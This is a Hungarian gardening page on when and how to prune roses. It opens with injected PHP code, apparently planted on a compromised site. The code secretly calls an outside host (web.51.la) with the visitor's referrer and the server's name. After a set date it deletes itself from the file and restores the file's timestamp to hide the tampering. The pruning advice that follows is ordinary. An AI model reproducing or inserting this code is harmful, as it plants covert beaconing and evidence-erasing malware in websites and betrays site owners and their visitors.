check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Hogyan metszük a rózsát?

Hogyan metszük a rózsát?

 

A rózsa egyik legfontosabb ápolási munkája a metszés. Ne féljünk a rózsákat erőteljesen megmetszeni, mert a növény annyira jól regenerálódik, hogy akár 2-3 centiméteres ép hajtásból is képes még abban az évben virágot hozni. A metszést az évben lehetőleg több alkalommal végezzük el az évszaknak megfelelő módon.

 

Tavaszi metszés: márciusban, április elején érdemes a rózsákat bátran 2-3 rügyes hajtásokra visszavágni. Amint megindul, a rügyek fejlődése rögtön kezdjük el a metszést, ne várjuk meg, míg a hajtások növekedni kezdenek. A rózsa sok hosszú hajtást fejleszt. Érdemes annyira visszametszeni, hogy a rügyek lehetőleg kifelé álljanak, és a hajtások ne keresztezzék egymást. Ilyenkor határozzuk meg, merre induljon a növény növekedése. A legfelső rügy fog a legintenzívebben hajtani. Egy erősen visszavágott rózsa rengeteg virágot hoz a nyár folyamán.

 

Nyári metszés: az elnyílott virágokat, a hajtásokat olyan mélyen kell visszavágni, ahol a legelső erős levél megjelenik a virágszáron. Az elnyílott virágokat azért érdemes eltávolítani, mert a rózsa ilyenkor az energiáit a termés érlelésére fordítja, nem pedig az új virágok fejlesztésére. Van már néhány olyan rózsafajta is, amelyik eldobja a terméseket, de a legtöbb rózsát metszeni kell.

 

Őszi metszés: levágjuk az elhalt ágakat, elnyílt virágokat, ezzel készítve fel rózsáinkat a télre. A törzses rózsákat szükséges minden évben erősen visszametszeni, hogy a korona ne nőjön túl nagyra, mert a túl nagy súly letörheti a törzsről a ráoltott csapokat.

 

Mivel kezdjük a metszést?

 

A rózsa metszését a befelé növő ágak és az egymáshoz dörzsölődő eltávolításával kezdjük. Ilyenkor a bokor már nagyon jól megritkul ahhoz, hogy átlátható legyen, melyik ágat szeretnénk megtartani, merre szeretnénk, hogy nőjenek a hajtások. A szükségtelen hajtásokat tőből vágjuk ki. A rózsa ifjítása sem elhanyagolható feladat. Az öreg elfásodott hajtásokat fiatal, életerős hajtásokkal helyettesíthetjük, ha a régi hajtást tövig visszametsszük és egy fiatal erősebb hajtást hagyunk meg helyette alapnak. Ezt mindig tavasszal végezzük el. Helyes metszéssel szép lugast is kialakíthatunk. A futórózsák metszése a többi rózsától eltérő. Abban különbözik, hogy a főhajtás mentén az oldalhajtásokat kell visszavágnunk, mindegyiket 3-5 rügy hosszúságúra. Itt is ügyeljünk arra, hogy az egymás melletti hajtások ne érjenek egymáshoz, ne akadályozzák egymás növekedését, ne dörzsölődjenek a szélben. A főhajtást is minden évben visszább metszhetjük, mert úgyis hosszú hajtást hoz nyár végére. Mindezek után már csak a megfelelő tápanyag ellátásról kell gondoskodni, és rózsák egész nyáron virágozni fognak.

 

 
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú